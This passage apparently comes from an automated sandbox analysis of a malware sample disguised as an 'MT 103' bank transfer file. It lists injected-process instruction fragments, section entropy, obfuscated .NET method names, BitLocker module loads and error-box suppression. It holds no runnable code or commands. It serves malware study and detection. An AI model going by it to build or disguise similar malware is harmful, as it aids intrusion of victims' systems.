Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Code function: 4_2_01251368 push eax; iretd	4_2_01251369
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6FBB02 push esp; retn 0000h	6_2_0E6FBB03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6FBB1E push esp; retn 0000h	6_2_0E6FBB1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E6FB9B5 push esp; retn 0000h	6_2_0E6FBAE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E4B1E push esp; retn 0000h	6_2_0E7E4B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E4B02 push esp; retn 0000h	6_2_0E7E4B03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E7E49B5 push esp; retn 0000h	6_2_0E7E4AE7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_008E1A6D push ecx; ret	7_2_008E1A80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047A27FA pushad ; ret	7_2_047A27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047A225F pushad ; ret	7_2_047A27F9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047A283D push eax; iretd	7_2_047A2858
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_047D09AD push ecx; mov dword ptr [esp], ecx	7_2_047D09B6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005C7116 push ss; iretd	7_2_005C7118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_005C7132 push ecx; iretd	7_2_005C7133

Source: hbwebdownload - MT 103.exe

Static PE information: section name: .text entropy: 7.704162970307028

Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, rfmO69TxWCcNDPn7aW.cs	High entropy of concatenated method names: 'fORB6oPrs', 'Ci47Z4fYj', 'q8J8LYlhF', 'Aq81nOqgA', 'ExJUBY565', 'yA26ekJ1k', 'gTDcFfYHL2oGHNoiAX', 'm8EdXn7oaC0tsexweL', 'dsKcwBFeB', 'y7lYLnr3I'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, hc50nSIAa7VAsnUMkY3.cs	High entropy of concatenated method names: 'a0sXjPYJwQ', 'hstXfY0DXT', 'QmmXBnwe6S', 'WGXX7PAb90', 'zfEXJLN8t7', 'IYPX8X5Ybw', 'PHxX17gdHR', 'eiYXMojjaj', 'S50XUHftvO', 'lDLX67pNbk'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, TsDevx9XV1O5LHc0c9.cs	High entropy of concatenated method names: 'JnTcO3Gy49', 'z1UcCIp0XA', 'Qa7cFcc4no', 'aTkcDvXSWO', 'SikcNAt5n7', 'BZscxX4xLV', 'HP1cleWSaE', 'alOcWQ0x6M', 'iZrcq33qRL', 'oPZcHX6osi'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, idYrOp0fFZIYPwoQ23.cs	High entropy of concatenated method names: 'oeGLqy9Or5', 'WZDLHUdGvN', 'ToString', 'JFGLOeP6b7', 'qHjLCBc3W4', 'XIXLF9AYpl', 'Hs9LDheIqu', 'lpWLNDOlPE', 'QgpLxxAaIG', 'e4uLlGCm2x'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, lULG0C6NjPxmNyNPol.cs	High entropy of concatenated method names: 'TVpDJVed6v', 'ynnD1WQ6rg', 'fdkFgrFsvp', 'dJLFrTkLkf', 'vjOFi13QJP', 'EAvF2vCcaq', 'vF9FGuBtoD', 'iSVFbcV4Ye', 'TufFSZjia4', 'xbVFv35dN8'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, BuRqQMy8aIcKHcydKM.cs	High entropy of concatenated method names: 'nMSuMctt8e', 'sN6uUUKodm', 'GBgusGQC3t', 'y5nu40fTli', 'uTtur8910k', 'MPRui1vJY4', 'LvCuGLg0yk', 'sfWubfBdoy', 'hF8uvjM2S8', 'xkdupNG62R'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, r9YZi2Imfcqx8t4BZR1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HgDYo7YvqP', 'CPAYwrheQE', 'NwPYtKOjxa', 'mNxY0oVDPb', 'drFYEMQQQ9', 'NwZYKFMjsj', 'SoYYQBCs7f'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, enD1A1Fd1tAJ3Y3xlH.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'H5RTZWISnO', 'kxvT38BATk', 'fUCTz5ZZ4K', 'wmEmAfw0yT', 'SY2mIleDVl', 'QX4mTuVBRh', 'n3kmm3XRYf', 'UOaNeDje1gw06mC8F50'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, ialaiDGS30U62Iyp6G.cs	High entropy of concatenated method names: 'ofhxO3ZDTe', 'tByxFvaD2W', 'P7BxNc7ZLe', 'RuwN3ptpmc', 'VbkNzJ9b51', 'UAuxAJUYJP', 'Xo2xIp7ITr', 'k0jxTqry4w', 'T4Mxme0pL4', 'DuixhlSEDw'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	High entropy of concatenated method names: 'olhmdbR8br', 'roSmOgFlxq', 'iq5mCHMCwJ', 'CApmFWRxKt', 'VwBmD0RaiD', 'frjmNg9bTJ', 'oMAmx3R3oC', 'CLrmli2MmA', 'HCHmWXVmla', 'InrmqILHse'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, mrijnaZ3dxslJfOBtR.cs	High entropy of concatenated method names: 'RCEcsNsOA9', 'Nw3c486Ijj', 'pGNcgmKbDl', 'Dg5crpuUtM', 'wiKcoGqswM', 'FhMci6k9vV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, F596u4USVjx7GmRdQm.cs	High entropy of concatenated method names: 'QMgF7E58lt', 'x63F8DK1E5', 'M4pFMiFxXL', 'WXFFUQ2xoi', 'P5FFndyv15', 'IOHFedr1BB', 'jlNFL4EDiD', 'mipFcVtdM5', 'ioVFX5XMOS', 'aYjFYtXjTP'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, DAbknxzDJaZrPLtQfb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P5yXuAXxO0', 'QohXn5ayYT', 'hjaXeP74YU', 'UypXL6rHG0', 'rr4XcboNZT', 'yKfXXMfohu', 'QPsXY98TrM'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, FLkqok34esMY6gI71g.cs	High entropy of concatenated method names: 'F9tXIxfu5C', 'C7YXmr5NYe', 'ykXXhwg4wd', 'QoQXOdGg2M', 'lyEXCyTliR', 'FcKXDICFwS', 'dBeXNZNYCl', 'wwpcQHytXv', 'tAOc9CQx5O', 'c9EcZRCqeC'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, wfKd5VCuDZ8E83bq6G.cs	High entropy of concatenated method names: 'Dispose', 'qmQIZvAoUN', 'WU7T4Gmp8n', 'xm5559Fkul', 'B0sI3DevxX', 'w1OIz5LHc0', 'ProcessDialogKey', 'q9qTArijna', 'YdxTIslJfO', 'ztRTT6Lkqo'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, FveECYsvfIsPyjj5Xf.cs	High entropy of concatenated method names: 'qKCNdxHuAi', 'bjONCs7xTQ', 'F4JND9PjDB', 's5xNxbnYfc', 'aipNlNK9Qv', 'frrDEy18TT', 'XDhDKLsip9', 'POZDQh5PrF', 'bmnD9lEMC8', 'nQPDZy70kw'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, qNbE6rKNj3AKpTflhq.cs	High entropy of concatenated method names: 'C7yL9c3y7P', 'qmlL3jyGG4', 'x0mcAJpebZ', 'drtcIc3YXy', 'uQ1LpFgUCC', 'omtLPKn7MH', 'q0oLyhmxBw', 'vhULoNe0GE', 'kCPLwD3jHq', 'DSpLtjFRCg'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, zYHQWct4MdPKFCaSkd.cs	High entropy of concatenated method names: 'ToString', 'lQAepDcS7R', 'VgKe4OHmPJ', 'u0teg4HKyJ', 'GiBerTm0o5', 'Pueeid13kH', 'FsRe2aVbQx', 'q8VeGQ8IhK', 'T9yebtlZIp', 'X8oeSdPfG5'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, DBYRBBSUdpvjMPQY36.cs	High entropy of concatenated method names: 'AcuxjyXyj2', 'NaFxfLA3LL', 'iEHxBI2GOB', 'tB8x7lFq9X', 'mSrxJVATKp', 'I8rx8ogjQa', 'Fecx1673vx', 'E9kxMQkYPL', 'lmExUnvE14', 'Sjgx6fQ8q6'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, pvMKoqM6A35QhnIeqC.cs	High entropy of concatenated method names: 'Fv0CoPweZm', 'hmvCwKVl2H', 'jqGCtmyl1W', 'JxOC04GAEh', 'AgHCE1Nh3D', 'm9HCKePiDA', 'kaPCQNIn8f', 'ReuC9ae4we', 'QkNCZHnOSd', 'M5dC3tHRii'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, jvSCVbo8l2i3fLUEWT.cs	High entropy of concatenated method names: 'nRPnvgHjHr', 'JG3nPkmPYy', 'SD5noX6Q7g', 'vCqnwdXeqe', 'l46n4YBY6r', 'bS1ngDaHoi', 'YqBnrpXgHw', 'VCknimajoX', 'ex0n2TuJCC', 'a42nGQt1xv'
Source: 0.2.hbwebdownload - MT 103.exe.78c0000.3.raw.unpack, GVonZPhHHaVyO2iIbd.cs	High entropy of concatenated method names: 'a9eIxvMKoq', 'EA3Il5QhnI', 'HSVIqjx7Gm', 'wdQIHmWULG', 'PNPInol6ve', 'UCYIevfIsP', 'Iu4L2t252sQ2FVsbnQ', 'gKKh4y3io4niDNNNYb', 'TsyIILoNAD', 'apRImFHCVX'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, rfmO69TxWCcNDPn7aW.cs	High entropy of concatenated method names: 'fORB6oPrs', 'Ci47Z4fYj', 'q8J8LYlhF', 'Aq81nOqgA', 'ExJUBY565', 'yA26ekJ1k', 'gTDcFfYHL2oGHNoiAX', 'm8EdXn7oaC0tsexweL', 'dsKcwBFeB', 'y7lYLnr3I'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, hc50nSIAa7VAsnUMkY3.cs	High entropy of concatenated method names: 'a0sXjPYJwQ', 'hstXfY0DXT', 'QmmXBnwe6S', 'WGXX7PAb90', 'zfEXJLN8t7', 'IYPX8X5Ybw', 'PHxX17gdHR', 'eiYXMojjaj', 'S50XUHftvO', 'lDLX67pNbk'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, TsDevx9XV1O5LHc0c9.cs	High entropy of concatenated method names: 'JnTcO3Gy49', 'z1UcCIp0XA', 'Qa7cFcc4no', 'aTkcDvXSWO', 'SikcNAt5n7', 'BZscxX4xLV', 'HP1cleWSaE', 'alOcWQ0x6M', 'iZrcq33qRL', 'oPZcHX6osi'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, idYrOp0fFZIYPwoQ23.cs	High entropy of concatenated method names: 'oeGLqy9Or5', 'WZDLHUdGvN', 'ToString', 'JFGLOeP6b7', 'qHjLCBc3W4', 'XIXLF9AYpl', 'Hs9LDheIqu', 'lpWLNDOlPE', 'QgpLxxAaIG', 'e4uLlGCm2x'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, lULG0C6NjPxmNyNPol.cs	High entropy of concatenated method names: 'TVpDJVed6v', 'ynnD1WQ6rg', 'fdkFgrFsvp', 'dJLFrTkLkf', 'vjOFi13QJP', 'EAvF2vCcaq', 'vF9FGuBtoD', 'iSVFbcV4Ye', 'TufFSZjia4', 'xbVFv35dN8'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, BuRqQMy8aIcKHcydKM.cs	High entropy of concatenated method names: 'nMSuMctt8e', 'sN6uUUKodm', 'GBgusGQC3t', 'y5nu40fTli', 'uTtur8910k', 'MPRui1vJY4', 'LvCuGLg0yk', 'sfWubfBdoy', 'hF8uvjM2S8', 'xkdupNG62R'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, r9YZi2Imfcqx8t4BZR1.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HgDYo7YvqP', 'CPAYwrheQE', 'NwPYtKOjxa', 'mNxY0oVDPb', 'drFYEMQQQ9', 'NwZYKFMjsj', 'SoYYQBCs7f'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, enD1A1Fd1tAJ3Y3xlH.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'H5RTZWISnO', 'kxvT38BATk', 'fUCTz5ZZ4K', 'wmEmAfw0yT', 'SY2mIleDVl', 'QX4mTuVBRh', 'n3kmm3XRYf', 'UOaNeDje1gw06mC8F50'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, ialaiDGS30U62Iyp6G.cs	High entropy of concatenated method names: 'ofhxO3ZDTe', 'tByxFvaD2W', 'P7BxNc7ZLe', 'RuwN3ptpmc', 'VbkNzJ9b51', 'UAuxAJUYJP', 'Xo2xIp7ITr', 'k0jxTqry4w', 'T4Mxme0pL4', 'DuixhlSEDw'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, JMVBdtlhbZ96poP7Cj.cs	High entropy of concatenated method names: 'olhmdbR8br', 'roSmOgFlxq', 'iq5mCHMCwJ', 'CApmFWRxKt', 'VwBmD0RaiD', 'frjmNg9bTJ', 'oMAmx3R3oC', 'CLrmli2MmA', 'HCHmWXVmla', 'InrmqILHse'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, mrijnaZ3dxslJfOBtR.cs	High entropy of concatenated method names: 'RCEcsNsOA9', 'Nw3c486Ijj', 'pGNcgmKbDl', 'Dg5crpuUtM', 'wiKcoGqswM', 'FhMci6k9vV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, F596u4USVjx7GmRdQm.cs	High entropy of concatenated method names: 'QMgF7E58lt', 'x63F8DK1E5', 'M4pFMiFxXL', 'WXFFUQ2xoi', 'P5FFndyv15', 'IOHFedr1BB', 'jlNFL4EDiD', 'mipFcVtdM5', 'ioVFX5XMOS', 'aYjFYtXjTP'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, DAbknxzDJaZrPLtQfb.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P5yXuAXxO0', 'QohXn5ayYT', 'hjaXeP74YU', 'UypXL6rHG0', 'rr4XcboNZT', 'yKfXXMfohu', 'QPsXY98TrM'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, FLkqok34esMY6gI71g.cs	High entropy of concatenated method names: 'F9tXIxfu5C', 'C7YXmr5NYe', 'ykXXhwg4wd', 'QoQXOdGg2M', 'lyEXCyTliR', 'FcKXDICFwS', 'dBeXNZNYCl', 'wwpcQHytXv', 'tAOc9CQx5O', 'c9EcZRCqeC'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, wfKd5VCuDZ8E83bq6G.cs	High entropy of concatenated method names: 'Dispose', 'qmQIZvAoUN', 'WU7T4Gmp8n', 'xm5559Fkul', 'B0sI3DevxX', 'w1OIz5LHc0', 'ProcessDialogKey', 'q9qTArijna', 'YdxTIslJfO', 'ztRTT6Lkqo'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, FveECYsvfIsPyjj5Xf.cs	High entropy of concatenated method names: 'qKCNdxHuAi', 'bjONCs7xTQ', 'F4JND9PjDB', 's5xNxbnYfc', 'aipNlNK9Qv', 'frrDEy18TT', 'XDhDKLsip9', 'POZDQh5PrF', 'bmnD9lEMC8', 'nQPDZy70kw'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, qNbE6rKNj3AKpTflhq.cs	High entropy of concatenated method names: 'C7yL9c3y7P', 'qmlL3jyGG4', 'x0mcAJpebZ', 'drtcIc3YXy', 'uQ1LpFgUCC', 'omtLPKn7MH', 'q0oLyhmxBw', 'vhULoNe0GE', 'kCPLwD3jHq', 'DSpLtjFRCg'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, zYHQWct4MdPKFCaSkd.cs	High entropy of concatenated method names: 'ToString', 'lQAepDcS7R', 'VgKe4OHmPJ', 'u0teg4HKyJ', 'GiBerTm0o5', 'Pueeid13kH', 'FsRe2aVbQx', 'q8VeGQ8IhK', 'T9yebtlZIp', 'X8oeSdPfG5'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, DBYRBBSUdpvjMPQY36.cs	High entropy of concatenated method names: 'AcuxjyXyj2', 'NaFxfLA3LL', 'iEHxBI2GOB', 'tB8x7lFq9X', 'mSrxJVATKp', 'I8rx8ogjQa', 'Fecx1673vx', 'E9kxMQkYPL', 'lmExUnvE14', 'Sjgx6fQ8q6'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, pvMKoqM6A35QhnIeqC.cs	High entropy of concatenated method names: 'Fv0CoPweZm', 'hmvCwKVl2H', 'jqGCtmyl1W', 'JxOC04GAEh', 'AgHCE1Nh3D', 'm9HCKePiDA', 'kaPCQNIn8f', 'ReuC9ae4we', 'QkNCZHnOSd', 'M5dC3tHRii'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, jvSCVbo8l2i3fLUEWT.cs	High entropy of concatenated method names: 'nRPnvgHjHr', 'JG3nPkmPYy', 'SD5noX6Q7g', 'vCqnwdXeqe', 'l46n4YBY6r', 'bS1ngDaHoi', 'YqBnrpXgHw', 'VCknimajoX', 'ex0n2TuJCC', 'a42nGQt1xv'
Source: 0.2.hbwebdownload - MT 103.exe.4a8bf10.0.raw.unpack, GVonZPhHHaVyO2iIbd.cs	High entropy of concatenated method names: 'a9eIxvMKoq', 'EA3Il5QhnI', 'HSVIqjx7Gm', 'wdQIHmWULG', 'PNPInol6ve', 'UCYIevfIsP', 'Iu4L2t252sQ2FVsbnQ', 'gKKh4y3io4niDNNNYb', 'TsyIILoNAD', 'apRImFHCVX'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\hbwebdownload - MT 103.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
